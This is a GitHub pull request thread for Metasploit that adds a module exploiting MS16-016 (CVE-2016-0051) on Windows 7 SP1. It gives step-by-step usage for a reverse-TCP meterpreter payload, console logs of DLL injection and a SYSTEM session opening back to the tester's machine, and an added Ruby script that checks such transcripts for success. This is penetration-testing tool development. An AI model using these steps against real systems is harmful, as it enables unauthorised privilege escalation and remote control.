
Add ms16-016 local privilege escalation (originally #6695) #7075

Merged
merged 3 commits into from Jul 6, 2016

Conversation

wwebb-r7
Contributor

@wwebb-r7 wwebb-r7 commented Jul 6, 2016

Adds module which exploits MS16-016 (CVE-2016-0051). This was originally #6695 - I've had one dead SSD and a lot of drama in between now and then

@sinn3r @OJ tagged as original reviewers

Verification

List the steps needed to make sure this thing works

  • Get a Windows 7 x86 SP1 VM
  • Create a meterpreter payload for the target using msfvenom
  • use exploits/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost your_ip_address
  • set lport whatever_port_you_configured_the_payload_with
  • run -j
  • Execute the payload on the target system
  • Verify that you get a meterpreter session going
  • background
  • use exploits/windows/local/ms16_016_webdav
  • set payload windows/meterpreter/reverse_tcp
  • set lhost your_ip_address
  • set lport whatever_port_you_configured_the_payload_with
  • set session whatever_your_meterpreter_session_number_is
  • run

You should see something like this:
[screenshot: ms16]

  • Verify that the new session privileges are NT AUTHORITY\SYSTEM via 'getuid' in meterpreter

@wwebb-r7
Contributor Author

wwebb-r7 commented Jul 6, 2016

Of course I forget the module docs ... or did I?

```ruby
[
  [ 'CVE', '2016-0051' ],
  [ 'MSB', 'MS16-016' ],
  [ 'URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0051' ]
```
Contributor


This isn't needed because it's already your first reference :-)

@wchen-r7 wchen-r7 self-assigned this Jul 6, 2016
@wchen-r7
Contributor

wchen-r7 commented Jul 6, 2016

Hmmm it's not working for me:

```
msf exploit(ms16_016_webdav) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-6NH0Q8CJQVM
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms16_016_webdav) > show options

Module options (exploit/windows/local/ms16_016_webdav):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.23.1      yes       The listen address
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP1


msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 172.16.23.1:5555
[*] Launching notepad to host the exploit...
[+] Process 3384 launched.
[*] Reflectively injecting the exploit DLL into 3384...
[*] Exploit injected ... injecting payload into 3384...
[*] Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
[*] Exploit completed, but no session was created.
msf exploit(ms16_016_webdav) >
```

@wchen-r7
Contributor

wchen-r7 commented Jul 6, 2016

Oh no, never mind. It is working. The firewall blocked it.

@wchen-r7
Contributor

wchen-r7 commented Jul 6, 2016

```
msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 172.16.23.1:5555
[*] Launching notepad to host the exploit...
[+] Process 2124 launched.
[*] Reflectively injecting the exploit DLL into 2124...
[*] Exploit injected ... injecting payload into 2124...
[*] Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
[*] Sending stage (957999 bytes) to 172.16.23.177
[*] Meterpreter session 2 opened (172.16.23.1:5555 -> 172.16.23.177:49589) at 2016-07-06 11:58:12 -0500

meterpreter >
```
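The two runs above show the module's two observable outcomes: "Exploit completed, but no session was created" (the callback never reached the handler, here because of a firewall) and "Meterpreter session N opened". The following Ruby script is an added example, not code from this PR or from Metasploit: it parses a saved msfconsole transcript of an `exploit/windows/local/ms16_016_webdav` run and reports whether the verification steps from the PR description were satisfied (a session opened, and `getuid` shows `NT AUTHORITY\SYSTEM`). It assumes the transcript line formats shown in the comments above and the `Server username:` line that meterpreter's `getuid` prints; the two sample transcripts are constructed from the output posted in this thread.

```ruby
# Added example, not code from this PR or from Metasploit: classify a saved
# msfconsole transcript of an exploit/windows/local/ms16_016_webdav run and
# check whether verification succeeded. Sample transcripts are constructed
# from the output shown in the PR comments.

SESSION_RE    = /Meterpreter session (\d+) opened \(([\d.]+):(\d+) -> ([\d.]+):(\d+)\)/
NO_SESSION_RE = /Exploit completed, but no session was created/
INJECT_RE     = /Reflectively injecting the exploit DLL into (\d+)/
# Line format meterpreter's 'getuid' prints; the SYSTEM check keys on it.
GETUID_RE     = /Server username: (.+)$/

Result = Struct.new(:status, :host_pid, :session_id, :target, :hint)

# Classify one exploit run from its console output.
def classify_run(transcript)
  host_pid = transcript[INJECT_RE, 1]&.to_i # PID the exploit DLL was injected into
  if (m = SESSION_RE.match(transcript))
    Result.new(:session_opened, host_pid, m[1].to_i, m[4], nil)
  elsif NO_SESSION_RE.match?(transcript)
    Result.new(:no_session, host_pid, nil, nil,
               'exploit ran but no callback reached the handler; check LHOST/LPORT and the host firewall')
  else
    Result.new(:incomplete, host_pid, nil, nil, 'transcript ends before the module reported a result')
  end
end

# True when 'getuid' output shows the session is running as SYSTEM.
def system_privileges?(getuid_output)
  user = getuid_output[GETUID_RE, 1]
  !user.nil? && user.strip.casecmp('NT AUTHORITY\\SYSTEM').zero?
end

# Constructed sample: the run where the firewall blocked the callback.
FAILED_RUN = <<~LOG
  [*] Started reverse TCP handler on 172.16.23.1:5555
  [*] Launching notepad to host the exploit...
  [+] Process 3384 launched.
  [*] Reflectively injecting the exploit DLL into 3384...
  [*] Exploit injected ... injecting payload into 3384...
  [*] Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
  [*] Exploit completed, but no session was created.
LOG

# Constructed sample: the run that produced session 2.
SUCCESSFUL_RUN = <<~LOG
  [*] Started reverse TCP handler on 172.16.23.1:5555
  [*] Launching notepad to host the exploit...
  [+] Process 2124 launched.
  [*] Reflectively injecting the exploit DLL into 2124...
  [*] Exploit injected ... injecting payload into 2124...
  [*] Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
  [*] Sending stage (957999 bytes) to 172.16.23.177
  [*] Meterpreter session 2 opened (172.16.23.1:5555 -> 172.16.23.177:49589) at 2016-07-06 11:58:12 -0500
LOG

if __FILE__ == $PROGRAM_NAME
  [FAILED_RUN, SUCCESSFUL_RUN].each do |log|
    r = classify_run(log)
    puts "#{r.status}: host pid #{r.host_pid}, session #{r.session_id.inspect}, " \
         "target #{r.target.inspect}#{r.hint && " (#{r.hint})"}"
  end
  puts system_privileges?("Server username: NT AUTHORITY\\SYSTEM")
end
```

Run it against a transcript captured with `spool` or copied from the console; a `:no_session` result with a populated `host_pid` is the signature of the case wchen-r7 hit, where injection succeeded but the reverse connection was filtered.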

@wchen-r7 wchen-r7 merged commit d923a5d into rapid7:master Jul 6, 2016
@wchen-r7
Contributor

wchen-r7 commented Jul 6, 2016

Release Notes

Add MS16-016 WebDAV null pointer dereference vulnerability - This module allows you to exploit a null pointer dereference vulnerability in Windows 7 SP1's WebDAV, and escalate your privilege to SYSTEM.

@OJ
Contributor

OJ commented Jul 6, 2016

Nice work! Looks great.
